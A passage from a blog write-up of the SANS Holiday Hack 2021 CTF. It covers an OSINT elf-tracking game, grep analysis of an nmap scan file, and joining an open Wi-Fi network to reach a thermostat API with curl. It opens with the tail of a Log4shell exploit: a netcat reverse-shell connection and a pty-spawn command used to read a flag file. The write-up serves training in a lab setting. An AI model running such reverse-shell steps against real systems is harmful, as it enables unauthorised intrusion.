&lt;p&gt;And finally, in our &lt;code&gt;netcat&lt;/code&gt; term, we get a connect back:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;Listening on [172.17.0.2] 4444 ...&lt;/span&gt;
&lt;span class="go"&gt;connect to [172.17.0.2] from (UNKNOWN) [172.17.0.2] 37922&lt;/span&gt;
&lt;span class="go"&gt;python3 -c &amp;quot;import pty; pty.spawn(&amp;#39;/bin/bash&amp;#39;)&amp;quot;&lt;/span&gt;
&lt;span class="gp"&gt;solr@b428502271ab:/opt/solr/server$&lt;/span&gt; whoami
&lt;span class="go"&gt;whoami&lt;/span&gt;
&lt;span class="go"&gt;solr&lt;/span&gt;
&lt;span class="gp"&gt;solr@b428502271ab:/opt/solr/server$&lt;/span&gt; cat /home/solr/kringle.txt
&lt;span class="go"&gt;cat /home/solr/kringle.txt&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;The solution to Log4shell is patching.&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;Sincerely,&lt;/span&gt;

&lt;span class="go"&gt;Santa&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can then finally run the &lt;code&gt;runtoanswer&lt;/code&gt; executable:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;~$ runtoanswer&lt;/span&gt;
&lt;span class="go"&gt;What is Santa&amp;#39;s solution for Log4j?&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt; patching
&lt;/span&gt;&lt;span class="go"&gt;Your answer: patching&lt;/span&gt;

&lt;span class="go"&gt;Checking.....&lt;/span&gt;
&lt;span class="go"&gt;Your answer is correct!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="where-in-the-world-is-caramel-santiago"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id10"&gt;Where in the World is Caramel Santiago?&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We find Tangle Coalbox in Santa's courtyard. They need our help to find one of
Santa's missing elf.&lt;/p&gt;
&lt;img alt="Tangle Coalbox. They're a green elf, wearing a white t-shirt, a dark green skirt, a forest-greend Christmas hat, and black shoes. They seem non-plussed." class="align-center" src="/images/sans-christmas-challenge-2021/tanglecoalbox.png" /&gt;
&lt;p&gt;&lt;em&gt;Tangle Coalbox says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hey there, Gumshoe. Tangle Coalbox here again.&lt;/p&gt;
&lt;p&gt;I've got a real doozy of a case for you this year.&lt;/p&gt;
&lt;p&gt;Turns out some elves have gone on some misdirected journeys around the
globe. It seems that someone is messing with their travel plans.&lt;/p&gt;
&lt;p&gt;We could sure use your open source intelligence (OSINT) skills to find
them.&lt;/p&gt;
&lt;p&gt;Why dontcha' log into this vintage Cranberry Pi terminal and see if you
have what it takes to track them around the globe.&lt;/p&gt;
&lt;p&gt;If you're having any trouble with it, you might ask Piney Sappington right
over there for tips.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We click on the Cranberry Pi terminal, and a game starts up:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Where in the World is Caramel Santaigo?&lt;/p&gt;
&lt;p&gt;Welcome! In this game you will analyze clues and track an elf around the
world. Put clues about your elf in your InterRink portal. Depart by sleigh
once you've figured out your next stop.&lt;/p&gt;
&lt;p&gt;Be sure to get there by Sunday, gumshoe. Good luck!&lt;/p&gt;
&lt;p&gt;Start Game!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Once we click on &lt;code&gt;Start Game&lt;/code&gt;, the investigation begins! Here's how the
game basically works:&lt;/p&gt;
&lt;ol class="arabic"&gt;
&lt;li&gt;&lt;p class="first"&gt;We arrive at a location with a short description.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p class="first"&gt;We have three links:&lt;/p&gt;
&lt;p&gt;a. Investigate: we get three clues regarding where the elf is going, and
what they are like.&lt;/p&gt;
&lt;p&gt;b. Visit InterRink: this is an interface where we can input an elf's
characteristics, and filter matching elves. There are five possible
characteristics:&lt;/p&gt;
&lt;blockquote&gt;
&lt;ol class="lowerroman simple"&gt;
&lt;li&gt;Language spoken (programming language)&lt;/li&gt;
&lt;li&gt;Preferred social medium&lt;/li&gt;
&lt;li&gt;Preferred indents&lt;/li&gt;
&lt;li&gt;Fandom&lt;/li&gt;
&lt;li&gt;Pronounces &amp;quot;GIF&amp;quot;&lt;/li&gt;
&lt;/ol&gt;
&lt;/blockquote&gt;
&lt;p&gt;c. Depart by sleigh: this is where we decide where we'll go next to
follow the missing elf.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The missing elf is different each time we play the game, so I'll give you the
elements I got for my run, but your experience will be different.&lt;/p&gt;
&lt;p&gt;We first start at Santa's Castle :&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Santa's Castle
Monday, 0900&lt;/p&gt;
&lt;p&gt;Newly renovated, the castle is again host to the best holiday hacker
conference in the world, KringleCon. Security specialists from around the
world travel here annually to enjoy each other's company, practice skills,
and learn about the latest advancements in information security.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Here's what I got from my investigation here:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;The elf wanted to drink gløgg in Tivoli Gardens.&lt;/li&gt;
&lt;li&gt;They sent me this blurry selfie of themself or someone they met:&lt;/li&gt;
&lt;/ol&gt;
&lt;img alt="A pixelated photo of an elf. They seem to be wearing blue trousers, a dark green vest and a dark green Christmas hat." class="align-center" src="/images/sans-christmas-challenge-2021/blurry_selfie.png" /&gt;
&lt;ol class="arabic simple" start="3"&gt;
&lt;li&gt;They were dressed for 6.0°C and mist conditions. The elf mentioned something
about Stack Overflow and Rust.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Our first clue for InterRink is that they're favorite programming language is
&lt;code&gt;Rust&lt;/code&gt;. Now, they wanted to drink &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Gl%C3%B6gg"&gt;gløgg&lt;/a&gt;
in &lt;a class="reference external" href="https://www.visitcopenhagen.com/copenhagen/planning/tivoli-gardens-gdk424504"&gt;Tivoli Gardens&lt;/a&gt;.
So they most likely went to Copenhagen. Let's depart by sleigh and select this
destination.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Copenhagen, Denmark
Monday, 2100&lt;/p&gt;
&lt;p&gt;Whether you're ice skating in Tivoli Gardens or eating Risalamande,
Copenhagen, Denmark is a wonderful place to enjoy the holidays. Families
count down through Christmas Eve with advent calendars and wreaths in their
homes.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Here's what I got from my investigation here:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;I think they left to check out the Défilé de Noël.&lt;/li&gt;
&lt;li&gt;They called me and mentioned they were connected via Rogers Wireless.&lt;/li&gt;
&lt;li&gt;They were dressed for 3.7°C and clear conditions. They kept checking their
Snapchat app.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Our second clue for InterRink is that their favorite social medium is
&lt;code&gt;Snapchat&lt;/code&gt;. Now, they're connected via &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Rogers_Wireless"&gt;Rogers Wireless&lt;/a&gt;,
which is a Canadian wireless telephone company. They wanted to check out the
&lt;a class="reference external" href="https://rove.me/to/montreal/christmas-parades"&gt;Défilé de Noël&lt;/a&gt;. So they
most likely went to Montréal (un petit bonjour à nos camarades du Québec).
Let's select this destination.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Montréal, Canada
Tuesday, 1600&lt;/p&gt;
&lt;p&gt;French-Canadian city Montréal proudly hosts lovely, unique Christmas
traditions. This is home to the Défilé de Noël festival, fairs, fireworks
displays, and a decades-old Santa parade. You might even spot Québec City's
Bonhomme de Neige.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Here's what I got from my investigation here:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;I've heard that when British children put letters to Father Christmas in the
fireplace, they magically end up there!&lt;/li&gt;
&lt;li&gt;They just contacted us from an address in the 80.95.128.0/20 range.&lt;/li&gt;
&lt;li&gt;They were dressed for -1.0°C and light freezing rain conditions. Oh, I
noticed they had a Doctor Who themed phone case.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Our third and final clue for InterRink is the elf's fandom, &lt;code&gt;Doctor Who&lt;/code&gt;.
Now, they contacted us from an address in the 80.95.128.0/20 range. Let's
checkout where this is from:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; whois &lt;span class="m"&gt;80&lt;/span&gt;.95.128.0/20
&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;span class="go"&gt;organisation:   ORG-SSPO1-RIPE&lt;/span&gt;
&lt;span class="go"&gt;org-name:       Lounea Palvelut Oy&lt;/span&gt;
&lt;span class="go"&gt;country:        FI&lt;/span&gt;
&lt;span class="go"&gt;org-type:       LIR&lt;/span&gt;
&lt;span class="go"&gt;address:        PL 108&lt;/span&gt;
&lt;span class="go"&gt;address:        24100&lt;/span&gt;
&lt;span class="go"&gt;address:        Salo&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;address:        FINLAND&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;phone:          +358 2970700&lt;/span&gt;
&lt;span class="go"&gt;admin-c:        TJ458&lt;/span&gt;
&lt;span class="go"&gt;admin-c:        RP413-RIPE&lt;/span&gt;
&lt;span class="go"&gt;admin-c:        TJ458&lt;/span&gt;
&lt;span class="go"&gt;admin-c:        SR1000-RIPE&lt;/span&gt;
&lt;span class="go"&gt;admin-c:        MR15973-RIPE&lt;/span&gt;
&lt;span class="go"&gt;abuse-c:        AR15150-RIPE&lt;/span&gt;
&lt;span class="go"&gt;mnt-ref:        RIPE-NCC-HM-MNT&lt;/span&gt;
&lt;span class="go"&gt;mnt-ref:        SSPOY-MNT&lt;/span&gt;
&lt;span class="go"&gt;mnt-by:         RIPE-NCC-HM-MNT&lt;/span&gt;
&lt;span class="go"&gt;mnt-by:         SSPOY-MNT&lt;/span&gt;
&lt;span class="go"&gt;created:        2004-04-17T11:20:30Z&lt;/span&gt;
&lt;span class="go"&gt;last-modified:  2020-12-16T12:32:14Z&lt;/span&gt;
&lt;span class="go"&gt;source:         RIPE # Filtered&lt;/span&gt;
&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So they most likely went to Rovaniemi. Let's head out there:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Rovaniemi, Finland
Wednesday, 1100&lt;/p&gt;
&lt;p&gt;So much like the North Pole, Lapland is where British youngsters send
letters to Santa. Enjoy a reindeer sleigh ride, ice fishing, or baking
lessons with Mrs. Claus.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Our investigation is complete, let's input our characteristics in InterRink,
and filter matching elves. During my run, I found out it was
&lt;code&gt;Piney Sappington&lt;/code&gt;. Let's tell Tangle Coalbox:&lt;/p&gt;
&lt;img alt="Tangle Coalbox. They're a green elf, wearing a white t-shirt, a dark green skirt, a forest-greend Christmas hat, and black shoes. They seem non-plussed." class="align-center" src="/images/sans-christmas-challenge-2021/tanglecoalbox.png" /&gt;
&lt;p&gt;&lt;em&gt;Tangle Coalbox says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
You never cease to amaze, Kid. Thanks for your help.&lt;/blockquote&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-3"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id11"&gt;Objective 3:&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="greasy-gopherguts-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id12"&gt;Greasy Gopherguts's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We're told to find some answer in a &lt;code&gt;nmap&lt;/code&gt; result file called
&lt;code&gt;bigscan.gnmap&lt;/code&gt;. This output file was created by running &lt;code&gt;nmap&lt;/code&gt;
with the &lt;code&gt;-oG&lt;/code&gt; option, which outputs the results as a &lt;code&gt;grep&lt;/code&gt;-able
file.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;Howdy howdy!  Mind helping me with this homew- er, challenge?&lt;/span&gt;
&lt;span class="go"&gt;Someone ran nmap -oG on a big network and produced this bigscan.gnmap file.&lt;/span&gt;
&lt;span class="go"&gt;The quizme program has the questions and hints and, incidentally,&lt;/span&gt;
&lt;span class="go"&gt;has NOTHING to do with an Elf University assignment. Thanks!&lt;/span&gt;

&lt;span class="go"&gt;Answer all the questions in the quizme executable:&lt;/span&gt;
&lt;span class="go"&gt;- What port does 34.76.1.22 have open?&lt;/span&gt;
&lt;span class="go"&gt;- What port does 34.77.207.226 have open?&lt;/span&gt;
&lt;span class="go"&gt;- How many hosts appear &amp;quot;Up&amp;quot; in the scan?&lt;/span&gt;
&lt;span class="go"&gt;- How many hosts have a web port open?  (Let&amp;#39;s just use TCP ports 80, 443, and 8080)&lt;/span&gt;
&lt;span class="go"&gt;- How many hosts with status Up have no (detected) open TCP ports?&lt;/span&gt;
&lt;span class="go"&gt;- What&amp;#39;s the greatest number of TCP ports any one host has open?&lt;/span&gt;

&lt;span class="go"&gt;Check out bigscan.gnmap and type quizme to answer each question.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If you want to try it out yourself, you can download &lt;code&gt;bigscan.gnmap&lt;/code&gt;
&lt;a class="reference external" href="/docs/sans-christmas-challenge-2021/bigscan.gnmap"&gt;right here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Let's first see what port 34.76.1.22 has open. I'm using the &lt;code&gt;-w&lt;/code&gt; option
of &lt;code&gt;grep&lt;/code&gt; to avoid matching IPs such as 34.76.1.220 or any other:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@dff505dd2d93:~$&lt;/span&gt; grep -w &lt;span class="m"&gt;34&lt;/span&gt;.76.1.22 bigscan.gnmap
&lt;span class="go"&gt;Host: 34.76.1.22 ()     Status: Up&lt;/span&gt;
&lt;span class="go"&gt;Host: 34.76.1.22 ()     Ports: 62078/open/tcp//iphone-sync///      Ignored State: closed (999)&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, let's check for IP 34.77.207.226. I kept the &lt;code&gt;-w&lt;/code&gt; to prevent
matching IPs such as 134.77.207.226 or any other:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@dff505dd2d93:~$&lt;/span&gt; grep -w &lt;span class="m"&gt;34&lt;/span&gt;.77.207.226 bigscan.gnmap
&lt;span class="go"&gt;Host: 34.77.207.226 ()     Status: Up&lt;/span&gt;
&lt;span class="go"&gt;Host: 34.77.207.226 ()     Ports: 8080/open/tcp//http-proxy///      Ignored State: filtered (999)&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, let's count occurrences of the &lt;code&gt;Status: Up&lt;/code&gt; string:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@dff505dd2d93:~$&lt;/span&gt; grep -c &lt;span class="s1"&gt;&amp;#39;Status: Up&amp;#39;&lt;/span&gt; bigscan.gnmap
&lt;span class="go"&gt;26054&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, let's search for IPs with TCP ports 80, 443, or 8080 open. I use the
&lt;code&gt;\b&lt;/code&gt; character in my regular expression. This character represents a
word separator. This is to make sure that we don't match prot numbers such
as 1080 or any other where our port numbers could be suffixes:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@dff505dd2d93:~$&lt;/span&gt; grep -cE &lt;span class="s1"&gt;&amp;#39;\b(80|443|8080)/open/tcp&amp;#39;&lt;/span&gt; bigscan.gnmap
&lt;span class="go"&gt;14372&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;To find the number of IPs who are up but without any open ports, we'll just
count the occurrences of &lt;code&gt;Ports:&lt;/code&gt; and subtract that number from the
number of IPs we found when searching for &lt;code&gt;Status: Up&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@dff505dd2d93:~$&lt;/span&gt; grep -c &lt;span class="s1"&gt;&amp;#39;Ports:&amp;#39;&lt;/span&gt; bigscan.gnmap
&lt;span class="go"&gt;25652&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The answer is therefore &lt;span class="formula"&gt;26054 − 25652 = 402&lt;/span&gt;.&lt;/p&gt;
&lt;p&gt;For the last question, we'll &lt;code&gt;grep&lt;/code&gt; for the string &lt;code&gt;open&lt;/code&gt;, with
the &lt;code&gt;-n&lt;/code&gt; option. This will give us the number of each matching line. We
also use the &lt;code&gt;-o&lt;/code&gt; option so that only our matching string (&lt;code&gt;open&lt;/code&gt;)
is displayed with our line number.&lt;/p&gt;
&lt;p&gt;This way, we'll have the line number appear as many times as any occurrences of
&lt;code&gt;open&lt;/code&gt; in that line. We'll then count our line numbers with
&lt;code&gt;uniq -c&lt;/code&gt;, &lt;code&gt;sort&lt;/code&gt; them from greatest to lowest, and get the
greatest number with our &lt;code&gt;head&lt;/code&gt; command:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@dff505dd2d93:~$&lt;/span&gt; grep -no open bigscan.gnmap &lt;span class="p"&gt;|&lt;/span&gt; cut -d: -f &lt;span class="m"&gt;1&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; sort &lt;span class="p"&gt;|&lt;/span&gt; uniq -c &lt;span class="p"&gt;|&lt;/span&gt; sort -nr &lt;span class="p"&gt;|&lt;/span&gt; head -n &lt;span class="m"&gt;1&lt;/span&gt;
&lt;span class="go"&gt; 12 43460&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Line number 43460 appears the most time in our output, with a total of 12
occurrences. This means that there is twelve times the string &lt;code&gt;open&lt;/code&gt; in
linea 43460. Therefore, the greatest number of open TCP ports for one host is
12.&lt;/p&gt;
&lt;p&gt;We launch the &lt;code&gt;quizme&lt;/code&gt; command to input each of our answers, until
we're finally told: c:ode:&lt;cite&gt;You've done it!&lt;/cite&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="thaw-frost-tower-s-entrance"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id13"&gt;Thaw Frost Tower's Entrance&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Alright, let's see what is going on at FrostFest. We walk up to the tower,
but the door is frozen, and we can't open it. Let's talk to the troll next to
it:&lt;/p&gt;
&lt;img alt="Grimy McTrollkins. They're a green troll wearing a white pajamas with a red- and green-Christmas light motif. They have frizzy dark hair." class="align-center" src="/images/sans-christmas-challenge-2021/grimymctrollkins.png" /&gt;
&lt;p&gt;&lt;em&gt;Grimy McTrollkins says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Yo, I'm Grimy McTrollkins.&lt;/p&gt;
&lt;p&gt;I'm a troll and I work for the big guy over there: Jack Frost.&lt;/p&gt;
&lt;p&gt;I’d rather not be bothered talking with you, but I’m kind of in a bind and
need your help.&lt;/p&gt;
&lt;p&gt;Jack Frost is so obsessed with icy cold that he accidentally froze shut the
door to Frost Tower!&lt;/p&gt;
&lt;p&gt;I wonder if you can help me get back in.&lt;/p&gt;
&lt;p&gt;I think we can melt the door open if we can just get access to the
thermostat inside the building.&lt;/p&gt;
&lt;p&gt;That thermostat uses Wi-Fi. And I’ll bet you picked up a Wi-Fi adapter for
your badge when you got to the North Pole.&lt;/p&gt;
&lt;p&gt;Click on your badge and go to the &lt;strong&gt;Items&lt;/strong&gt; tab. There, you should see your
Wi-Fi Dongle and a button to “Open Wi-Fi CLI.” That’ll give you
command-line interface access to your badge’s wireless capabilities.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Oooookay, way to be welcoming Grimy. You're lucky I need to enter myself.
Alright, let's fire up our Wi-Fi adapter:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;ATTENTION ALL ELVES&lt;/span&gt;

&lt;span class="go"&gt;In Santa&amp;#39;s workshop (wireless division), we&amp;#39;ve been busy adding new Cranberry&lt;/span&gt;
&lt;span class="go"&gt;Pi features. We&amp;#39;re proud to present an experimental version of the Cranberry&lt;/span&gt;
&lt;span class="go"&gt;Pi, now with Wi-Fi support!&lt;/span&gt;

&lt;span class="go"&gt;This beta version of the Cranberry Pi has Wi-Fi hardware and software&lt;/span&gt;
&lt;span class="go"&gt;support using the Linux wireless-tools package. This means you can use iwlist&lt;/span&gt;
&lt;span class="go"&gt;to search for Wi-Fi networks, and connect with iwconfig! Read the manual&lt;/span&gt;
&lt;span class="go"&gt;pages to learn more about these commands:&lt;/span&gt;

&lt;span class="go"&gt;man iwlist&lt;/span&gt;

&lt;span class="go"&gt;man iwconfig&lt;/span&gt;

&lt;span class="go"&gt;I&amp;#39;m afraid there aren&amp;#39;t a lot of Wi-Fi networks in the North Pole yet, but if&lt;/span&gt;
&lt;span class="go"&gt;you keep scanning maybe you&amp;#39;ll find something interesting.&lt;/span&gt;

&lt;span class="go"&gt;                                                 - Sparkle Redberry&lt;/span&gt;



&lt;span class="gp"&gt;elf@b7635de6f012:~$&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Sweet, we now have Wi-Fi capabilities in our terminal. Let's try to connect to
the thermostat over WiFi. First, we need to find the corresponding SSID:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@b7635de6f012:~$&lt;/span&gt; iwlist scan
&lt;span class="go"&gt;wlan0     Scan completed :&lt;/span&gt;
&lt;span class="go"&gt;          Cell 01 - Address: 02:4A:46:68:69:21&lt;/span&gt;
&lt;span class="go"&gt;                    Frequency:5.2 GHz (Channel 40)&lt;/span&gt;
&lt;span class="go"&gt;                    Quality=48/70  Signal level=-62 dBm&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;                    Encryption key:off&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;                    Bit Rates:400 Mb/s&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;                    ESSID:&amp;quot;FROST-Nidus-Setup&amp;quot;&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The SSID is &lt;code&gt;FROST-Nidus-Setup&lt;/code&gt;, and there's no authentication. That's
naughty! Let's connect to it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@b7635de6f012:~$&lt;/span&gt; iwconfig wlan0 essid FROST-Nidus-Setup
&lt;span class="go"&gt;** New network connection to Nidus Thermostat detected! Visit http://nidus-setup:8080/ to complete setup&lt;/span&gt;
&lt;span class="go"&gt;(The setup is compatible with the &amp;#39;curl&amp;#39; utility)&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now that we're connected, we can interact with the thermostat using
&lt;code&gt;curl&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@b7635de6f012:~$&lt;/span&gt; curl http://nidus-setup:8080/
&lt;span class="go"&gt;◈──────────────────────────────────────────────────────────────────────────────◈&lt;/span&gt;

&lt;span class="go"&gt;Nidus Thermostat Setup&lt;/span&gt;

&lt;span class="go"&gt;◈──────────────────────────────────────────────────────────────────────────────◈&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="go"&gt;WARNING Your Nidus Thermostat is not currently configured! Access to this&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;device is restricted until you register your thermostat » /register. Once you&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;have completed registration, the device will be fully activated.&lt;/span&gt;
&lt;/span&gt;
&lt;span class="go"&gt;In the meantime, Due to North Pole Health and Safety regulations&lt;/span&gt;
&lt;span class="go"&gt;42 N.P.H.S 2600(h)(0) - frostbite protection, you may adjust the temperature.&lt;/span&gt;

&lt;span class="go"&gt;API&lt;/span&gt;

&lt;span class="go"&gt;The API for your Nidus Thermostat is located at http://nidus-setup:8080/apidoc&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Seems like we need to register against the thermostat before we can interact
with it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@b7635de6f012:~$&lt;/span&gt; curl http://nidus-setup:8080/register
&lt;span class="go"&gt;◈──────────────────────────────────────────────────────────────────────────────◈&lt;/span&gt;

&lt;span class="go"&gt;Nidus Thermostat Registration&lt;/span&gt;

&lt;span class="go"&gt;◈──────────────────────────────────────────────────────────────────────────────◈&lt;/span&gt;

&lt;span class="go"&gt;Welcome to the Nidus Thermostat registration! Simply enter your serial number&lt;/span&gt;
&lt;span class="go"&gt;below to get started. You can find the serial number on the back of your&lt;/span&gt;
&lt;span class="go"&gt;Nidus Thermostat as shown below:&lt;/span&gt;

&lt;span class="go"&gt;  Serial Number: ______________________&lt;/span&gt;


&lt;span class="go"&gt;         +------------+&lt;/span&gt;
&lt;span class="go"&gt;         |   Submit   |&lt;/span&gt;
&lt;span class="go"&gt;         +------------+&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Dang, we need to submit the serial number, but we don't have physical access to
the thermostat. The documentation mentioned an API, let's see if we can
interact with it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@b7635de6f012:~$&lt;/span&gt; curl http://nidus-setup:8080/apidoc
&lt;span class="go"&gt;◈──────────────────────────────────────────────────────────────────────────────◈&lt;/span&gt;

&lt;span class="go"&gt;Nidus Thermostat API&lt;/span&gt;

&lt;span class="go"&gt;◈──────────────────────────────────────────────────────────────────────────────◈&lt;/span&gt;

&lt;span class="go"&gt;The API endpoints are accessed via:&lt;/span&gt;

&lt;span class="go"&gt;http://nidus-setup:8080/api/&amp;lt;endpoint&amp;gt;&lt;/span&gt;

&lt;span class="go"&gt;Utilize a GET request to query information; for example, you can check the&lt;/span&gt;
&lt;span class="go"&gt;temperatures set on your cooler with:&lt;/span&gt;

&lt;span class="go"&gt;curl -XGET http://nidus-setup:8080/api/cooler&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="go"&gt;Utilize a POST request with a JSON payload to configuration information; for&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;example, you can change the temperature on your cooler using:&lt;/span&gt;
&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;curl -XPOST -H &amp;#39;Content-Type: application/json&amp;#39; \&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;  --data-binary &amp;#39;{&amp;quot;temperature&amp;quot;: -40}&amp;#39; \&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;  http://nidus-setup:8080/api/cooler&lt;/span&gt;
&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="go"&gt;● WARNING: DO NOT SET THE TEMPERATURE ABOVE 0! That might melt important furniture&lt;/span&gt;
&lt;/span&gt;
&lt;span class="go"&gt;Available endpoints&lt;/span&gt;

&lt;span class="go"&gt;┌─────────────────────────────┬────────────────────────────────┐&lt;/span&gt;
&lt;span class="go"&gt;│ Path                        │ Available without registering? │&lt;/span&gt;
&lt;span class="go"&gt;├─────────────────────────────┼────────────────────────────────┤&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;│ /api/cooler                 │ Yes                            │&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;├─────────────────────────────┼────────────────────────────────┤&lt;/span&gt;
&lt;span class="go"&gt;│ /api/hot-ice-tank           │ No                             │&lt;/span&gt;
&lt;span class="go"&gt;├─────────────────────────────┼────────────────────────────────┤&lt;/span&gt;
&lt;span class="go"&gt;│ /api/snow-shower            │ No                             │&lt;/span&gt;
&lt;span class="go"&gt;├─────────────────────────────┼────────────────────────────────┤&lt;/span&gt;
&lt;span class="go"&gt;│ /api/melted-ice-maker       │ No                             │&lt;/span&gt;
&lt;span class="go"&gt;├─────────────────────────────┼────────────────────────────────┤&lt;/span&gt;
&lt;span class="go"&gt;│ /api/frozen-cocoa-dispenser │ No                             │&lt;/span&gt;
